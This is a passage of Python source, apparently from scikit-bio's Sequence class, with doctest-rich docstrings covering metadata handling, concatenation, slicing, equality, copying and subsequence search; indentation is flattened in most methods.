>>> pprint(subseq.metadata)
{'authors': ['Alice', 'Bob'],
'desc': 'seq desc',
'id': 'new-id',
'pubmed': 12345}
The subsequence has inherited the metadata of its parent sequence. If we
update the subsequence's author list, we see the changes propagated in the
parent sequence and original metadata dictionary:
>>> subseq.metadata['authors'].append('Carol')
>>> subseq.metadata['authors']
['Alice', 'Bob', 'Carol']
>>> seq.metadata['authors']
['Alice', 'Bob', 'Carol']
>>> metadata['authors']
['Alice', 'Bob', 'Carol']
The behavior for updating positional metadata is similar. Let's create a
new sequence with positional metadata that is already stored in a
``pd.DataFrame``:
>>> positional_metadata = pd.DataFrame(
... {'quality': [3, 3, 4, 10], 'list': [[], [], [], []]})
>>> seq = Sequence('ACGT', positional_metadata=positional_metadata)
>>> seq
Sequence
-----------------------------
Positional metadata:
'list': <dtype: object>
'quality': <dtype: int64>
Stats:
length: 4
-----------------------------
0 ACGT
>>> seq.positional_metadata
list quality
0 [] 3
1 [] 3
2 [] 4
3 [] 10
Now let's update the sequence's positional metadata by adding a new column
and changing a value in another column:
>>> seq.positional_metadata['gaps'] = [False, False, False, False]
>>> seq.positional_metadata.loc[0, 'quality'] = 999
>>> seq.positional_metadata
list quality gaps
0 [] 999 False
1 [] 3 False
2 [] 4 False
3 [] 10 False
Note that the original positional metadata (stored in variable
``positional_metadata``) hasn't changed because a shallow copy was made:
>>> positional_metadata
list quality
0 [] 3
1 [] 3
2 [] 4
3 [] 10
>>> seq.positional_metadata.equals(positional_metadata)
False
Next let's create a sequence that has been derived from another sequence:
>>> subseq = seq[1:3]
>>> subseq
Sequence
-----------------------------
Positional metadata:
'list': <dtype: object>
'quality': <dtype: int64>
'gaps': <dtype: bool>
Stats:
length: 2
-----------------------------
0 CG
>>> subseq.positional_metadata
list quality gaps
0 [] 3 False
1 [] 4 False
As described above for metadata, since only a *shallow* copy was made of
the positional metadata, updates to mutable objects will also change the
parent sequence's positional metadata and the original positional metadata
``pd.DataFrame``:
>>> subseq.positional_metadata.loc[0, 'list'].append('item')
>>> subseq.positional_metadata
list quality gaps
0 [item] 3 False
1 [] 4 False
>>> seq.positional_metadata
list quality gaps
0 [] 999 False
1 [item] 3 False
2 [] 4 False
3 [] 10 False
>>> positional_metadata
list quality
0 [] 3
1 [item] 3
2 [] 4
3 [] 10
"""
_number_of_extended_ascii_codes = 256
# ASCII is built such that the difference between uppercase and lowercase
# is the 6th bit.
_ascii_invert_case_bit_offset = 32
_ascii_lowercase_boundary = 90
default_write_format = 'fasta'
__hash__ = None
@property
@stable(as_of="0.4.0")
def values(self):
"""Array containing underlying sequence characters.
Notes
-----
This property is not writeable.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AACGA')
>>> s.values # doctest: +NORMALIZE_WHITESPACE
array([b'A', b'A', b'C', b'G', b'A'],
dtype='|S1')
"""
return self._bytes.view('|S1')
@property
@stable(as_of="0.4.0")
def metadata(self):
"""``dict`` containing metadata which applies to the entire sequence.
Notes
-----
This property can be set and deleted.
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
Create a sequence with metadata:
>>> s = Sequence('ACGTACGTACGTACGT',
... metadata={'id': 'seq-id',
... 'description': 'seq description'})
>>> s
Sequence
------------------------------------
Metadata:
'description': 'seq description'
'id': 'seq-id'
Stats:
length: 16
------------------------------------
0 ACGTACGTAC GTACGT
Retrieve metadata:
>>> pprint(s.metadata) # using pprint to display dict in sorted order
{'description': 'seq description', 'id': 'seq-id'}
Update metadata:
>>> s.metadata['id'] = 'new-id'
>>> s.metadata['pubmed'] = 12345
>>> pprint(s.metadata)
{'description': 'seq description', 'id': 'new-id', 'pubmed': 12345}
Set metadata:
>>> s.metadata = {'abc': 123}
>>> s.metadata
{'abc': 123}
Delete metadata:
>>> s.has_metadata()
True
>>> del s.metadata
>>> s.metadata
{}
>>> s.has_metadata()
False
"""
if self._metadata is None:
# not using setter to avoid copy
self._metadata = {}
return self._metadata
@metadata.setter
def metadata(self, metadata):
if not isinstance(metadata, dict):
raise TypeError("metadata must be a dict")
# shallow copy
self._metadata = metadata.copy()
@metadata.deleter
def metadata(self):
self._metadata = None
@property
@stable(as_of="0.4.0")
def positional_metadata(self):
"""``pd.DataFrame`` containing metadata on a per-character basis.
Notes
-----
This property can be set and deleted.
Examples
--------
Create a DNA sequence with positional metadata:
>>> from skbio import DNA
>>> seq = DNA(
... 'ACGT',
... positional_metadata={'quality': [3, 3, 20, 11],
... 'exons': [True, True, False, True]})
>>> seq
DNA
-----------------------------
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGT
Retrieve positional metadata:
>>> seq.positional_metadata
exons quality
0 True 3
1 True 3
2 False 20
3 True 11
Update positional metadata:
>>> seq.positional_metadata['gaps'] = seq.gaps()
>>> seq.positional_metadata
exons quality gaps
0 True 3 False
1 True 3 False
2 False 20 False
3 True 11 False
Set positional metadata:
>>> seq.positional_metadata = {'degenerates': seq.degenerates()}
>>> seq.positional_metadata
degenerates
0 False
1 False
2 False
3 False
Delete positional metadata:
>>> seq.has_positional_metadata()
True
>>> del seq.positional_metadata
>>> seq.positional_metadata
Empty DataFrame
Columns: []
Index: [0, 1, 2, 3]
>>> seq.has_positional_metadata()
False
"""
if self._positional_metadata is None:
# not using setter to avoid copy
self._positional_metadata = pd.DataFrame(
index=np.arange(len(self)))
return self._positional_metadata
@positional_metadata.setter
def positional_metadata(self, positional_metadata):
try:
# copy=True to copy underlying data buffer
positional_metadata = pd.DataFrame(positional_metadata, copy=True)
except pd.core.common.PandasError as e:
raise TypeError('Positional metadata invalid. Must be consumable '
'by pd.DataFrame. Original pandas error message: '
'"%s"' % e)
num_rows = len(positional_metadata.index)
if num_rows != len(self):
raise ValueError(
"Number of positional metadata values (%d) must match the "
"number of characters in the sequence (%d)." %
(num_rows, len(self)))
positional_metadata.reset_index(drop=True, inplace=True)
self._positional_metadata = positional_metadata
@positional_metadata.deleter
def positional_metadata(self):
self._positional_metadata = None
@property
@experimental(as_of="0.4.0-dev")
def observed_chars(self):
"""Set of observed characters in the sequence.
Notes
-----
This property is not writeable.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AACGAC')
>>> s.observed_chars == {'G', 'A', 'C'}
True
"""
return set(str(self))
@property
def _string(self):
return self._bytes.tostring()
@classonlymethod
@experimental(as_of="0.4.0-dev")
def concat(cls, sequences, how='strict'):
"""Concatenate an iterable of ``Sequence`` objects.
Parameters
----------
seqs : iterable (Sequence)
An iterable of ``Sequence`` objects or appropriate subclasses.
how : {'strict', 'inner', 'outer'}, optional
How to intersect the `positional_metadata` of the sequences.
If 'strict': the `positional_metadata` must have the exact same
columns; 'inner': an inner-join of the columns (only the shared set
of columns are used); 'outer': an outer-join of the columns
(all columns are used: missing values will be padded with NaN).
Returns
-------
Sequence
The returned sequence will be an instance of the class which
called this class-method.
Raises
------
ValueError
If `how` is not one of: 'strict', 'inner', or 'outer'.
ValueError
If `how` is 'strict' and the `positional_metadata` of each sequence
does not have the same columns.
TypeError
If the sequences cannot be cast as the calling class.
Notes
-----
The sequence-wide metadata (``Sequence.metadata``) is not retained
during concatentation.
Sequence objects can be cast to a different type only when the new
type is an ancestor or child of the original type. Casting between
sibling types is not allowed, e.g. ``DNA`` -> ``RNA`` is not
allowed, but ``DNA`` -> ``Sequence`` or ``Sequence`` -> ``DNA``
would be.
Examples
--------
Concatenate two DNA sequences into a new DNA object:
>>> from skbio import DNA, Sequence
>>> s1 = DNA("ACGT")
>>> s2 = DNA("GGAA")
>>> DNA.concat([s1, s2])
DNA
-----------------------------
Stats:
length: 8
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGTGGAA
Concatenate DNA sequences into a Sequence object (type coercion):
>>> Sequence.concat([s1, s2])
Sequence
-------------
Stats:
length: 8
-------------
0 ACGTGGAA
Positional metadata is conserved:
>>> s1 = DNA('AcgT', lowercase='one')
>>> s2 = DNA('GGaA', lowercase='one',
... positional_metadata={'two': [1, 2, 3, 4]})
>>> result = DNA.concat([s1, s2], how='outer')
>>> result
DNA
-----------------------------
Positional metadata:
'one': <dtype: bool>
'two': <dtype: float64>
Stats:
length: 8
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGTGGAA
>>> result.positional_metadata
one two
0 False NaN
1 True NaN
2 True NaN
3 False NaN
4 False 1
5 False 2
6 True 3
7 False 4
"""
if how not in {'strict', 'inner', 'outer'}:
raise ValueError("`how` must be 'strict', 'inner', or 'outer'.")
seqs = list(sequences)
for seq in seqs:
seq._assert_can_cast_to(cls)
if how == 'strict':
how = 'inner'
cols = []
for s in seqs:
if s.has_positional_metadata():
cols.append(frozenset(s.positional_metadata))
else:
cols.append(frozenset())
if len(set(cols)) > 1:
raise ValueError("The positional metadata of the sequences do"
" not have matching columns. Consider setting"
" how='inner' or how='outer'")
seq_data = []
pm_data = []
for seq in seqs:
seq_data.append(seq._bytes)
pm_data.append(seq.positional_metadata)
if not seq.has_positional_metadata():
del seq.positional_metadata
pm = pd.concat(pm_data, join=how, ignore_index=True)
bytes_ = np.concatenate(seq_data)
return cls(bytes_, positional_metadata=pm)
@classmethod
def _assert_can_cast_to(cls, target):
if not (issubclass(cls, target) or issubclass(target, cls)):
raise TypeError("Cannot cast %r as %r." %
(cls.__name__, target.__name__))
@stable(as_of="0.4.0")
def __init__(self, sequence, metadata=None, positional_metadata=None,
lowercase=False):
if isinstance(sequence, np.ndarray):
if sequence.dtype == np.uint8:
self._set_bytes_contiguous(sequence)
elif sequence.dtype == '|S1':
sequence = sequence.view(np.uint8)
# Guarantee the sequence is an array (might be scalar before
# this).
if sequence.shape == ():
sequence = np.array([sequence], dtype=np.uint8)
self._set_bytes_contiguous(sequence)
else:
raise TypeError(
"Can only create sequence from numpy.ndarray of dtype "
"np.uint8 or '|S1'. Invalid dtype: %s" %
sequence.dtype)
elif isinstance(sequence, Sequence):
# Sequence casting is acceptable between direct
# decendants/ancestors
sequence._assert_can_cast_to(type(self))
# we're not simply accessing sequence.metadata in order to avoid
# creating "empty" metadata representations on both sequence
# objects if they don't have metadata. same strategy is used below
# for positional metadata
if metadata is None and sequence.has_metadata():
metadata = sequence.metadata
if (positional_metadata is None and
sequence.has_positional_metadata()):
positional_metadata = sequence.positional_metadata
sequence = sequence._bytes
self._owns_bytes = False
self._set_bytes(sequence)
else:
# Python 3 will not raise a UnicodeEncodeError so we force it by
# encoding it as ascii
if isinstance(sequence, six.text_type):
sequence = sequence.encode("ascii")
s = np.fromstring(sequence, dtype=np.uint8)
# There are two possibilities (to our knowledge) at this point:
# Either the sequence we were given was something string-like,
# (else it would not have made it past fromstring), or it was a
# numpy scalar, and so our length must be 1.
if isinstance(sequence, np.generic) and len(s) != 1:
raise TypeError("Can cannot create a sequence with %r" %
type(sequence).__name__)
sequence = s
self._owns_bytes = True
self._set_bytes(sequence)
if metadata is None:
self._metadata = None
else:
self.metadata = metadata
if positional_metadata is None:
self._positional_metadata = None
else:
self.positional_metadata = positional_metadata
if lowercase is False:
pass
elif lowercase is True or isinstance(lowercase, six.string_types):
lowercase_mask = self._bytes > self._ascii_lowercase_boundary
self._convert_to_uppercase(lowercase_mask)
# If it isn't True, it must be a string_type
if not (lowercase is True):
self.positional_metadata[lowercase] = lowercase_mask
else:
raise TypeError("lowercase keyword argument expected a bool or "
"string, but got %s" % type(lowercase))
def _set_bytes_contiguous(self, sequence):
"""Munge the sequence data into a numpy array of dtype uint8."""
if not sequence.flags['C_CONTIGUOUS']:
# numpy doesn't support views of non-contiguous arrays. Since we're
# making heavy use of views internally, and users may also supply
# us with a view, make sure we *always* store a contiguous array to
# avoid hard-to-track bugs. See
# https://github.com/numpy/numpy/issues/5716
sequence = np.ascontiguousarray(sequence)
self._owns_bytes = True
else:
self._owns_bytes = False
self._set_bytes(sequence)
def _set_bytes(self, sequence):
sequence.flags.writeable = False
self._bytes = sequence
def _convert_to_uppercase(self, lowercase):
if np.any(lowercase):
with self._byte_ownership():
self._bytes[lowercase] ^= self._ascii_invert_case_bit_offset
@stable(as_of="0.4.0")
def __contains__(self, subsequence):
"""Determine if a subsequence is contained in the biological sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
The putative subsequence.
Returns
-------
bool
Indicates whether `subsequence` is contained in the biological
sequence.
Raises
------
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCGUGAAGGA')
>>> 'GGU' in s
True
>>> 'CCC' in s
False
"""
return self._munge_to_bytestring(subsequence, "in") in self._string
@stable(as_of="0.4.0")
def __eq__(self, other):
"""Determine if the biological sequence is equal to another.
Biological sequences are equal if they are *exactly* the same type and
their sequence characters, metadata, and positional metadata are the
same.
Parameters
----------
other : Sequence
Sequence to test for equality against.
Returns
-------
bool
Indicates whether the biological sequence is equal to `other`.
Examples
--------
Define two biological sequences that have the same underlying sequence
of characters:
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> t = Sequence('ACGT')
The two sequences are considered equal because they are the same type,
their underlying sequence of characters are the same, and their
optional metadata attributes (``metadata`` and ``positional_metadata``)
were not provided:
>>> s == t
True
>>> t == s
True
Define another biological sequence with a different sequence of
characters than the previous two biological sequences:
>>> u = Sequence('ACGA')
>>> u == t
False
Define a biological sequence with the same sequence of characters as
``u`` but with different metadata and positional metadata:
>>> v = Sequence('ACGA', metadata={'id': 'abc'},
... positional_metadata={'quality':[1, 5, 3, 3]})
The two sequences are not considered equal because their metadata and
positional metadata do not match:
>>> u == v
False
"""
# checks ordered from least to most expensive
if self.__class__ != other.__class__:
return False
# we're not simply comparing self.metadata to other.metadata in order
# to avoid creating "empty" metadata representations on the sequence
# objects if they don't have metadata. same strategy is used below for
# positional metadata
if self.has_metadata() and other.has_metadata():
if self.metadata != other.metadata:
return False
elif not (self.has_metadata() or other.has_metadata()):
# both don't have metadata
pass
else:
# one has metadata while the other does not
return False
if self._string != other._string:
return False
if self.has_positional_metadata() and other.has_positional_metadata():
if not self.positional_metadata.equals(other.positional_metadata):
return False
elif not (self.has_positional_metadata() or
other.has_positional_metadata()):
# both don't have positional metadata
pass
else:
# one has positional metadata while the other does not
return False
return True
@stable(as_of="0.4.0")
def __ne__(self, other):
"""Determine if the biological sequence is not equal to another.
Biological sequences are not equal if they are not *exactly* the same
type, or their sequence characters, metadata, or positional metadata
differ.
Parameters
----------
other : Sequence
Sequence to test for inequality against.
Returns
-------
bool
Indicates whether the biological sequence is not equal to `other`.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> t = Sequence('ACGT')
>>> s != t
False
>>> u = Sequence('ACGA')
>>> u != t
True
>>> v = Sequence('ACGA', metadata={'id': 'v'})
>>> u != v
True
"""
return not (self == other)
    @stable(as_of="0.4.0")
    def __getitem__(self, indexable):
        """Slice the biological sequence.

        Parameters
        ----------
        indexable : int, slice, iterable (int and slice), 1D array_like (bool)
            The position(s) to return from the biological sequence. If
            `indexable` is an iterable of integers, these are assumed to be
            indices in the sequence to keep. If `indexable` is a 1D
            ``array_like`` of booleans, these are assumed to be the positions
            in the sequence to keep.

        Returns
        -------
        Sequence
            New biological sequence containing the position(s) specified by
            `indexable` in the current biological sequence. If quality scores
            are present, they will be sliced in the same manner and included in
            the returned biological sequence. ID and description are also
            included.

        Examples
        --------
        >>> from skbio import Sequence
        >>> s = Sequence('GGUCGUGAAGGA')

        Obtain a single character from the biological sequence:

        >>> s[1]
        Sequence
        -------------
        Stats:
            length: 1
        -------------
        0 G

        Obtain a slice:

        >>> s[7:]
        Sequence
        -------------
        Stats:
            length: 5
        -------------
        0 AAGGA

        Obtain characters at the following indices:

        >>> s[[3, 4, 7, 0, 3]]
        Sequence
        -------------
        Stats:
            length: 5
        -------------
        0 CGAGC

        Obtain characters at positions evaluating to `True`:

        >>> s = Sequence('GGUCG')
        >>> index = [True, False, True, True, False]
        >>> s[index]
        Sequence
        -------------
        Stats:
            length: 3
        -------------
        0 GUC

        """
        # Generic iterables (not ndarray, not str) may mix ints and slices,
        # which numpy cannot represent as a single fancy index.
        if (not isinstance(indexable, np.ndarray) and
                ((not isinstance(indexable, six.string_types)) and
                 hasattr(indexable, '__iter__'))):
            indexable_ = indexable
            indexable = np.asarray(indexable)
            # dtype == object means the iterable held slices (or a mix), so
            # it must be processed element-by-element instead of vectorized.
            if indexable.dtype == object:
                indexable = list(indexable_)  # TODO: Don't blow out memory
                if len(indexable) == 0:
                    # indexing with an empty list, so convert to ndarray and
                    # fall through to ndarray slicing below
                    indexable = np.asarray(indexable)
                else:
                    # Gather each int/slice piece and stitch them together.
                    seq = np.concatenate(
                        list(_slices_from_iter(self._bytes, indexable)))
                    index = _as_slice_if_single_index(indexable)
                    positional_metadata = None
                    if self.has_positional_metadata():
                        pos_md_slices = list(_slices_from_iter(
                            self.positional_metadata, index))
                        positional_metadata = pd.concat(pos_md_slices)
                    return self._to(sequence=seq,
                                    positional_metadata=positional_metadata)
        elif (isinstance(indexable, six.string_types) or
                isinstance(indexable, bool)):
            raise IndexError("Cannot index with %s type: %r" %
                             (type(indexable).__name__, indexable))
        # A boolean mask must cover every position exactly once.
        # NOTE(review): "An boolean" grammar typo below is a user-visible
        # string; fixing it would change runtime behavior, so it is left.
        if (isinstance(indexable, np.ndarray) and
                indexable.dtype == bool and
                len(indexable) != len(self)):
            raise IndexError("An boolean vector index must be the same length"
                             " as the sequence (%d, not %d)." %
                             (len(self), len(indexable)))
        if isinstance(indexable, np.ndarray) and indexable.size == 0:
            # convert an empty ndarray to a supported dtype for slicing a numpy
            # array
            indexable = indexable.astype(int)
        seq = self._bytes[indexable]
        positional_metadata = self._slice_positional_metadata(indexable)
        return self._to(sequence=seq, positional_metadata=positional_metadata)
def _slice_positional_metadata(self, indexable):
if self.has_positional_metadata():
if _is_single_index(indexable):
index = _single_index_to_slice(indexable)
else:
index = indexable
return self.positional_metadata.iloc[index]
else:
return None
@stable(as_of="0.4.0")
def __len__(self):
"""Return the number of characters in the biological sequence.
Returns
-------
int
The length of the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> len(s)
4
"""
return self._bytes.size
@stable(as_of="0.4.0")
def __bool__(self):
"""Returns truth value (truthiness) of sequence.
Returns
-------
bool
True if length of sequence is greater than 0, else False.
Examples
--------
>>> from skbio import Sequence
>>> bool(Sequence(''))
False
>>> bool(Sequence('ACGT'))
True
"""
return len(self) > 0
__nonzero__ = __bool__
@stable(as_of="0.4.0")
def __iter__(self):
"""Iterate over positions in the biological sequence.
Yields
------
Sequence
Single character subsequence, one for each position in the
sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> for c in s:
... str(c)
'G'
'G'
'U'
'C'
"""
for i in range(len(self)):
yield self[i]
@stable(as_of="0.4.0")
def __reversed__(self):
"""Iterate over positions in the biological sequence in reverse order.
Yields
------
Sequence
Single character subsequence, one for each position in the
sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> for c in reversed(s):
... str(c)
'C'
'U'
'G'
'G'
"""
return iter(self[::-1])
@stable(as_of="0.4.0")
def __str__(self):
"""Return biological sequence characters as a string.
Returns
-------
str
Sequence characters as a string. No metadata or positional
metadata will be included.
See Also
--------
sequence
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCGUAAAGGA', metadata={'id':'hello'})
>>> str(s)
'GGUCGUAAAGGA'
"""
return str(self._string.decode("ascii"))
@stable(as_of="0.4.0")
def __repr__(self):
r"""Return a string representation of the biological sequence object.
Representation includes:
* sequence type
* metadata keys and values: will display key/value if it is an
understood type, otherwise just the type will be displayed. If it is
an understood type whose representation is too long, just the type
will be displayed
* positional metadata: column names and column dtypes will be displayed
in the order they appear in the positional metadata ``pd.DataFrame``.
Column names (i.e., keys) follow the same display rules as metadata
keys
* sequence stats (e.g., length)
* up to five lines of chunked sequence data. Each line of chunked
sequence data displays the current position in the sequence
Returns
-------
str
String representation of the biological sequence object.
Notes
-----
Subclasses can override Sequence._repr_stats to provide custom
statistics.
Examples
--------
Short sequence without metadata:
>>> from skbio import Sequence
>>> Sequence('ACGTAATGGATACGTAATGCA')
Sequence
-------------------------
Stats:
length: 21
-------------------------
0 ACGTAATGGA TACGTAATGC A
Longer sequence displays first two lines and last two lines:
>>> Sequence('ACGT' * 100)
Sequence
---------------------------------------------------------------------
Stats:
length: 400
---------------------------------------------------------------------
0 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
60 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
...
300 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
360 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
Sequence with metadata and positional metadata:
>>> metadata = {
... 'id': 'seq-id',
... 'description': 'description of the sequence, wrapping across '
... 'lines if it\'s too long',
... 'authors': ['Alice', 'Bob', 'Carol'],
... 'year': 2015,
... 'published': True
... }
>>> positional_metadata = {
... 'quality': [3, 10, 11, 10],
... 'exons': [True, True, False, True]
... }
>>> Sequence('ACGT', metadata=metadata,
... positional_metadata=positional_metadata)
Sequence
----------------------------------------------------------------------
Metadata:
'authors': <class 'list'>
'description': "description of the sequence, wrapping across lines
if it's too long"
'id': 'seq-id'
'published': True
'year': 2015
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
----------------------------------------------------------------------
0 ACGT
"""
return _SequenceReprBuilder(
seq=self,
width=71, # 79 for pep8, 8 space indent for docstrings
indent=4,
chunk_size=10).build()
def _repr_stats(self):
"""Define statistics to display in the sequence's repr.
Subclasses can override this method to provide type-specific
statistics.
This method computes a single statistic: length.
Returns
-------
list
List of tuples where each tuple represents a statistic. Each tuple
contains exactly two ``str`` elements: the statistic's name/label,
and the str-formatted value of the statistic. Ordering of
statistics (i.e., list order) determines display order in the
sequence repr.
"""
return [('length', '%d' % len(self))]
@stable(as_of="0.4.0")
def __copy__(self):
"""Return a shallow copy of the biological sequence.
See Also
--------
copy
Notes
-----
This method is equivalent to ``seq.copy(deep=False)``.
"""
return self.copy(deep=False)
@stable(as_of="0.4.0")
def __deepcopy__(self, memo):
"""Return a deep copy of the biological sequence.
See Also
--------
copy
Notes
-----
This method is equivalent to ``seq.copy(deep=True)``.
"""
return self._copy(True, memo)
@stable(as_of="0.4.0")
def has_metadata(self):
"""Determine if the sequence contains metadata.
Returns
-------
bool
Indicates whether the sequence has metadata
Examples
--------
>>> from skbio import DNA
>>> s = DNA('ACACGACGTT')
>>> s.has_metadata()
False
>>> t = DNA('ACACGACGTT', metadata={'id': 'seq-id'})
>>> t.has_metadata()
True
"""
return self._metadata is not None and bool(self.metadata)
@stable(as_of="0.4.0")
def has_positional_metadata(self):
"""Determine if the sequence contains positional metadata.
Returns
-------
bool
Indicates whether the sequence has positional metadata
Examples
--------
>>> from skbio import DNA
>>> s = DNA('ACACGACGTT')
>>> s.has_positional_metadata()
False
>>> t = DNA('ACACGACGTT', positional_metadata={'quality': range(10)})
>>> t.has_positional_metadata()
True
"""
return (self._positional_metadata is not None and
len(self.positional_metadata.columns) > 0)
@stable(as_of="0.4.0")
def copy(self, deep=False):
"""Return a copy of the biological sequence.
Parameters
----------
deep : bool, optional
Perform a deep copy. If ``False``, perform a shallow copy.
Returns
-------
Sequence
Copy of the biological sequence.
Notes
-----
Since sequence objects can share the same underlying immutable sequence
data (or pieces of it), this method can be used to create a sequence
object with its own copy of the sequence data so that the original
sequence data can be garbage-collected.
Examples
--------
Create a sequence:
>>> from pprint import pprint
>>> from skbio import Sequence
>>> seq = Sequence('ACGT',
... metadata={'id': 'seq-id', 'authors': ['Alice']},
... positional_metadata={'quality': [7, 10, 8, 5],
... 'list': [[], [], [], []]})
Make a shallow copy of the sequence:
>>> seq_copy = seq.copy()
>>> seq_copy == seq
True
Setting new references in the copied sequence's metadata doesn't affect
the original sequence's metadata:
>>> seq_copy.metadata['id'] = 'new-id'
>>> pprint(seq_copy.metadata)
{'authors': ['Alice'], 'id': 'new-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice'], 'id': 'seq-id'}
The same applies to the sequence's positional metadata:
>>> seq_copy.positional_metadata.loc[0, 'quality'] = 999
>>> seq_copy.positional_metadata
list quality
0 [] 999
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [] 7
1 [] 10
2 [] 8
3 [] 5
Since only a *shallow* copy was made, updates to mutable objects stored
as metadata affect the original sequence's metadata:
>>> seq_copy.metadata['authors'].append('Bob')
>>> pprint(seq_copy.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'new-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'seq-id'}
The same applies to the sequence's positional metadata:
>>> seq_copy.positional_metadata.loc[0, 'list'].append(1)
>>> seq_copy.positional_metadata
list quality
0 [1] 999
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [1] 7
1 [] 10
2 [] 8
3 [] 5
Perform a deep copy to avoid this behavior:
>>> seq_deep_copy = seq.copy(deep=True)
Updates to mutable objects no longer affect the original sequence's
metadata:
>>> seq_deep_copy.metadata['authors'].append('Carol')
>>> pprint(seq_deep_copy.metadata)
{'authors': ['Alice', 'Bob', 'Carol'], 'id': 'seq-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'seq-id'}
Nor its positional metadata:
>>> seq_deep_copy.positional_metadata.loc[0, 'list'].append(2)
>>> seq_deep_copy.positional_metadata
list quality
0 [1, 2] 7
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [1] 7
1 [] 10
2 [] 8
3 [] 5
"""
return self._copy(deep, {})
def _copy(self, deep, memo):
# strategy: copy the sequence without metadata first, then set metadata
# attributes with copies. we take this approach instead of simply
# passing the metadata through the Sequence constructor because we
# don't want to copy twice (this could happen when deep=True, where we
# deep copy here and then shallow copy in the Sequence constructor). we
# also directly set the private metadata attributes instead of using
# their public setters to avoid an unnecessary copy
# we don't make a distinction between deep vs. shallow copy of bytes
# because dtype=np.uint8. we only need to make the distinction when
# dealing with object dtype
bytes = np.copy(self._bytes)
seq_copy = self._constructor(sequence=bytes, metadata=None,
positional_metadata=None)
if self.has_metadata():
metadata = self.metadata
if deep:
metadata = copy.deepcopy(metadata, memo)
else:
metadata = metadata.copy()
seq_copy._metadata = metadata
if self.has_positional_metadata():
positional_metadata = self.positional_metadata
if deep:
positional_metadata = copy.deepcopy(positional_metadata, memo)
else:
# deep=True makes a shallow copy of the underlying data buffer
positional_metadata = positional_metadata.copy(deep=True)
seq_copy._positional_metadata = positional_metadata
return seq_copy
@stable(as_of='0.4.0')
def lowercase(self, lowercase):
"""Return a case-sensitive string representation of the sequence.
Parameters
----------
lowercase: str or boolean vector
If lowercase is a boolean vector, it is used to set sequence
characters to lowercase in the output string. True values in the
boolean vector correspond to lowercase characters. If lowercase
is a str, it is treated like a key into the positional metadata,
pointing to a column which must be a boolean vector.
That boolean vector is then used as described previously.
Returns
-------
str
String representation of sequence with specified characters set to
lowercase.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> s.lowercase([True, True, False, False])
'acGT'
>>> s = Sequence('ACGT',
... positional_metadata={
... 'exons': [True, False, False, True]})
>>> s.lowercase('exons')
'aCGt'
Constructor automatically populates a column in positional metadata
when the ``lowercase`` keyword argument is provided with a column name:
>>> s = Sequence('ACgt', lowercase='introns')
>>> s.lowercase('introns')
'ACgt'
>>> s = Sequence('ACGT', lowercase='introns')
>>> s.lowercase('introns')
'ACGT'
"""
index = self._munge_to_index_array(lowercase)
outbytes = self._bytes.copy()
outbytes[index] ^= self._ascii_invert_case_bit_offset
return str(outbytes.tostring().decode('ascii'))
@stable(as_of="0.4.0")
def count(self, subsequence, start=None, end=None):
"""Count occurrences of a subsequence in the biological sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Subsequence to count occurrences of.
start : int, optional
The position at which to start counting (inclusive).
end : int, optional
The position at which to stop counting (exclusive).
Returns
-------
int
Number of occurrences of `subsequence` in the biological sequence.
Raises
------
ValueError
If `subsequence` is of length 0.
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCG')
>>> s.count('G')
3
>>> s.count('GG')
1
>>> s.count('T')
0
>>> s.count('G', 2, 5)
1
"""
if len(subsequence) == 0:
raise ValueError("`count` is not defined for empty subsequences.")
return self._string.count(
self._munge_to_bytestring(subsequence, "count"), start, end)
@stable(as_of="0.4.0")
def index(self, subsequence, start=None, end=None):
"""Find position where subsequence first occurs in the sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Subsequence to search for in the biological sequence.
start : int, optional
The position at which to start searching (inclusive).
end : int, optional
The position at which to stop searching (exclusive).
Returns
-------
int
Position where `subsequence` first occurs in the biological
sequence.
Raises
------
ValueError
If `subsequence` is not present in the biological sequence.
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACACGACGTT-')
>>> s.index('ACG')
2
"""
try:
return self._string.index(
self._munge_to_bytestring(subsequence, "index"), start, end)
except ValueError:
raise ValueError(
"%r is not present in %r." % (subsequence, self))
@experimental(as_of="0.4.0")
